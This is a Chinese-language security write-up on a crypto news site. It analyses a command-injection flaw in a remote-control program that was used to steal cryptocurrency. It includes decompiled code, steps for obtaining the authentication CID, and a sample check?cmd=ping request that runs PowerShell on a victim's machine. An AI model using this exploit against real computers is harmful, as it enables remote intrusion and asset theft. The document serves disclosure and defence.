Cointime

扫码下载App
iOS & Android

Web3安全事件:黑客利用远程控制软件窃取加密货币

起因

最近许多Web3的加密货币持有者,在使用某远程控制软件期间,发生多起加密货币丢失事件。下图为其中一起事件。

黑客钱包地址:

0xbb3fd383d1c5540e52ef0a7bcb9433375793aeaf

这不得不联想到去年某远程控制软件http服务爆过cid泄漏+命令注入漏洞CNVD-2022-10270/CNVD-2022-03672;受害者每次启动该软件时,会自动随机开启一个大于40000的端口号作为http服务,在/check路由中,当参数cmd的值以ping或者nslookup开头时可以执行任意命令,攻击者可以下发c2 agent长期潜伏在受害者系统中观察。

影响版本:

个人版 for Windows <= 11.0.0.33162

简约版 <= V1.0.1.43315

分析

看一下login.cgi

v5 =(__int64 (__fastcall *)())operatornew(0x50ui64); v55 = v5; v54 =15i64; v53 =0i64; v51[0]=0; sub_1400F0690(v51,"login.cgi",9ui64); v6 = sub_140E2D6BC(v5, v51); v57 =&off_1410D3B20; v58 =(char(__fastcall *)(__int64, __int64))sub_140E1EE50; v59 = v52; v60 = a1; v61 =&v57; v66 =(_QWORD *)v6; if( v6 ) { v7 = v6 +8+*(int*)(*(_QWORD *)(v6 +8)+4i64); (*(void(__fastcall **)(__int64))(*(_QWORD *)v7 +8i64))(v7); } sub_140E2D85C(a1 +55,&v66,&v57); LOBYTE(v8)=1; sub_1400EEDC0(v51, v8,0i64); v56 =&v57; v9 =(__int64 (__fastcall *)())operatornew(0x50ui64); v55 = v9; v54 =15i64; v53 =0i64; v51[0]=0; sub_1400F0690(v51,(void*)"cgi-bin/login.cgi",0x11ui64); v10 = sub_140E2D6BC(v9, v51); v57 =&off_1410D3B20; v58 =(char(__fastcall *)(__int64, __int64))sub_140E1EE50; v59 = v52; v60 = a1; v61 =&v57; v66 =(_QWORD *)v10; if( v10 ) { v11 = v10 +8+*(int*)(*(_QWORD *)(v10 +8)+4i64); (*(void(__fastcall **)(__int64))(*(_QWORD *)v11 +8i64))(v11); } sub_140E2D85C(a1 +55,&v66,&v57); LOBYTE(v12)=1; sub_1400EEDC0(v51, v12,0i64); v56 =&v57; v13 =(__int64 (__fastcall *)())operatornew(0x50ui64); v55 = v13; v54 =15i64; v53 =0i64; v51[0]=0; sub_1400F0690(v51,(void*)"cgi-bin/rpc",0xBui64); v14 = sub_140E2D6BC(v13, v51); v57 =&off_1410D3B20; v58 = sub_140E1C954; v59 = v52; v60 = a1; v61 =&v57; v66 =(_QWORD *)v14; if( v14 ) { v15 = v14 +8+*(int*)(*(_QWORD *)(v14 +8)+4i64); (*(void(__fastcall **)(__int64))(*(_QWORD *)v15 +8i64))(v15); }

定位到cgi-bin/rpc

获得以下路由

v63 =(*(__int64 (__fastcall **)(_QWORD))(**(_QWORD **)(a1 +8)+104i64))(*(_QWORD *)(a1 +8)); sub_140320D80( (int)&qword_1414049C0, 1, (int)"..\\includes\\libsunloginclient\\client\\HttpDecideClientType.cpp", (int)"CHttpDecideTcpClientType::DecideClient", 205, "[Acceptor][HTTP] new RC HTTP connection %s,%s, plugin:%s, session:%s", v63); if((unsignedint)sub_140101DB0(v116,"login") && strcmp(v61,"express_login") && strcmp(v61,"cgi-bin/login.cgi") && strcmp(v61,"log") && strcmp(v61,"cgi-bin/rpc") && strcmp(v61,"transfer") && strcmp(v61,"cloudconfig") && strcmp(v61,"getfastcode") && strcmp(v61,"assist") && strcmp(v61,"cloudconfig") && strcmp(v61,"projection") && strcmp(v61,"getaddress") && strcmp(v61,"sunlogin-tools")) ... sub_1400F05E0(v116); goto LABEL_168; } } if(!(unsignedint)sub_140101DB0(v116,"login") ||!(unsignedint)sub_140101DB0(v116,"control") ||!strcmp(v61,"express_login") ||!strcmp(v61,"cgi-bin/login.cgi") ||!strcmp(v61,"cgi-bin/rpc") ||!strcmp(v61,"desktop.list") ||!strcmp(v61,"cloudconfig") ||!strcmp(v61,"check") ||!strcmp(v61,"transfer") ||!strcmp(v61,"getfastcode") ||!strcmp(v61,"assist") ||!strcmp(v61,"micro-live/enable") ||!strcmp(v61,"projection") ||!strcmp(v61,"getaddress")) { v103 =*(_QWORD *)(a1 +8);

根据网上披露的漏洞信息,先从cgi-bin/rpc路由获取的身份验证CID,可以看到action参数进行区分功能。

当action为verify-haras时,返回verify_string。

if(!(unsignedint)sub_140101DB0(v131,"verify-haras")) { sub_1400F0690(Src,"{\"__code\":0,\"enabled\":\"1\",\"verify_string\":\"",0x2Bui64); LOBYTE(v22)=1; v23 =(*(__int64 (__fastcall **)(_QWORD,char*, __int64))(**(_QWORD **)(*(_QWORD *)(a1 +416)+288i64)+144i64))( *(_QWORD *)(*(_QWORD *)(a1 +416)+288i64), v125, v22); sub_1400EEE40(Src, v23,0i64,-1i64); sub_1400F05E0(v125); sub_1400EEC60(Src,"\",\"code\":0} ",0xCui64); v73 =1; CxxThrowException(&v73,(_ThrowInfo *)&stru_1412F7B30); }

当action为login-type时,返回受害者设备相关信息。

if(!(unsignedint)sub_140101DB0(v131,"login-type")) { sub_1405ACBA0(v93); v16 ="0"; if((*(unsigned __int8 (__fastcall **)(_QWORD))(**(_QWORD **)(*(_QWORD *)(a1 +416)+288i64)+112i64))(*(_QWORD *)(*(_QWORD *)(a1 +416)+288i64))) ... memset(Buffer,0,sizeof(Buffer)); sub_140150A60( Buffer, "{\"__code\":0,\"use_custom\":%d,\"code\":0,\"version\":\"%s\",\"isbinding\":%s,\"isinstalled\":%s,\"isprojection\"" ":%s,\"platform\":\"%s\",\"mac\":\"%s\",\"request_need_pwd\":\"%s\",\"accept_request\":\"1\",\"support_file\":\"1\"" ",\"disable_remote_bind\":\"%s\"} "); if( Buffer[0]) { do ++v6; while( Buffer[v6]); v4 = v6; } sub_1400F0690(Src, Buffer, v4); v72 =1; CxxThrowException(&v72,(_ThrowInfo *)&stru_1412F7B30); }

除了以上还有fast-loginbind-request

再来看check路由,攻击者可以通过ping或nslookup进行构造恶意命令实现远程命令执行

getaddress路由可以获取到映射在外网固定端口的https服务地址,那这个地址是可以被网络资产搜索引擎抓取或被攻击者扫描到,所以攻击路径不局限于内网。

利用过程

每次启动时,会在40000+随机一个rpc接口的端口

第一步,获取受害者的CID。

第二步,添加CID进行身份认证Cookie:CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZIS并在受害者电脑执行任意命令。

查看受害者的系统文件

check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+dir+c:/

总结:

随着web3的持续发展,由于web3基础架构的隐匿性以及数字资产的高价值,黑客由传统的网络安全盗取数据转变在web3的生态里,盗取用户数字资产。很多黑客开始利用0day/1day来完成攻击目标设施,包括服务器,个人主机,钱包APP,移动客户端等,通过入侵这些系统,最终窃取用户的数字资产的目的,这里建议用户需要及时给系统打补丁,及时更新系统内的软件,不点击不明来源的连接,做好系统隔离,密钥需要在隔离系统中存放以及使用,不随便装不明来源的软件等。Numen 提供溯源,威胁情报,追币等服务,我们有行业顶级web3安全专家以及全球顶级的传统网络安全专家,持续研究,跟踪web3安全领域的问题,为您的数字资产安全保驾护航。

评论

所有评论

推荐阅读

  • 伊朗:敌军若地面进攻 将全军覆没

    Cointime 报道,4月2日讯,伊朗军队总司令哈塔米今天(4月2日)警告称,若敌军企图发动地面进攻,敌方士兵将无人存活。他要求军队必须以最大的警惕和怀疑态度,时刻监控敌人的动向和行动,并在适当时机实施应对敌方进攻的作战方案。(CCTV国际时讯)

  • Metaplanet第一季度共增持5075枚BTC,总持仓达40,177枚

    Cointime 报道,4月2日,Metaplanet CEO Simon Gerovich表示,2026年第一季度,公司以约79,898美元均价购入5,075枚BTC,总投入约4.0548亿美元,年初至今比特币收益率为2.8%。截至3月31日,公司累计持有40,177枚 BTC,总成本约41.8亿美元,平均成本约104,106美元。

  • BTC跌破67000美元

    Cointime 报道,行情显示,BTC跌破67000美元,现报66960.01美元,24小时跌幅达到1.21%,行情波动较大,请做好风险控制。

  • 美国总统特朗普宣称对伊朗战事取得“快速、决定性、压倒性胜利”

    Cointime 报道,4月1日,美国总统特朗普在首都华盛顿白宫发表讲话,自行宣称对伊朗战事取得“快速、决定性、压倒性胜利”。 特朗普还说,美国对伊朗战事的核心战略目标“接近完成”,对伊朗战事有望在“非常短时间内”完成所有军事目标。“未来两到三周内,我们将对他们进行极其猛烈的打击……同时,谈判也在进行。”(新华社)

  • ETH跌破2100美元

    Cointime 报道,行情显示,ETH跌破2100美元,现报2099.91美元,24小时跌幅达到0.04%,行情波动较大,请做好风险控制。

  • BTC跌破68000美元

    Cointime 报道,行情显示,BTC跌破68000美元,现报67997.84美元,24小时跌幅达到0.37%,行情波动较大,请做好风险控制。

  • Solana生态Drift Protocol遭攻击,损失至少2亿美元

    Cointime 报道,4月2日,基于 Solana 的衍生品交易平台 Drift Protocol 发生安全事件,链上数据显示损失至少约 2 亿美元,部分估算接近 2.7 亿美元。 项目方表示已发现异常活动并正在调查,提醒用户暂勿向协议存入资金,并强调“这不是愚人节玩笑”。 此次攻击涉及多个资金池,包括 JLP Delta Neutral、SOL Super Staking 及 BTC Super Staking 等。单笔约 4170 万枚 JLP 代币转移价值约 1.55 亿美元,此外 SOL、USDC、cbBTC 及 wBTC 等资产亦被转出。 根据统计,该事件或成为 Solana 生态中继 Wormhole bridge exploit 之后规模最大的 DeFi 攻击之一。

  • 美国财政部发布GENIUS法案首个实施规则草案,征求小型稳定币发行人州级监管意见

    Cointime 报道,4月2日,美国财政部发布《指导与建立美国稳定币国家创新法案》(GENIUS Act)首份拟议规则制定通知(NPRM),就小型稳定币发行人适用州级监管框架的认定标准征求公众意见。 该提案旨在明确:当州级监管体系与联邦框架“实质相似”时,发行规模低于100亿美元的稳定币发行人可选择接受州监管而非全面联邦监管。 公众将在该规则于《联邦公报》发布后拥有60天的意见反馈期。财政部表示,该规则将建立判断州级监管是否符合联邦标准的总体原则。 目前,包括联邦存款保险公司(FDIC)与货币监理署(OCC)在内的美国主要银行监管机构,亦正陆续发布相关规则草案,以推进稳定币监管框架落地。与此同时,GENIUS法案仍未涵盖生息型稳定币相关规则,该问题已成为国会推进更广泛加密市场结构立法的一大障碍。

  • BTC跌破68000美元

    Cointime 报道,行情显示,BTC跌破68000美元,现报67964.79美元,24小时涨幅达到1.36%,行情波动较大,请做好风险控制。

  • Web3数据和AI公司Validation Cloud完成1000万美元新一轮融资

    Web3数据和AI公司Validation Cloud宣布从True Global Ventures获得1000万美元融资,该公司计划利用这笔资金扩展其AI产品,实现对Web3数据的无缝访问。 据介绍,该公司的产品平台由三个部分组成:质押、节点API以及数据和AI。在质押方面,Validation Cloud的质押资产已超过10亿美元。Validation Cloud的一些客户包括 Chainlink、Aptos、Consensys、Stellar和Hedera。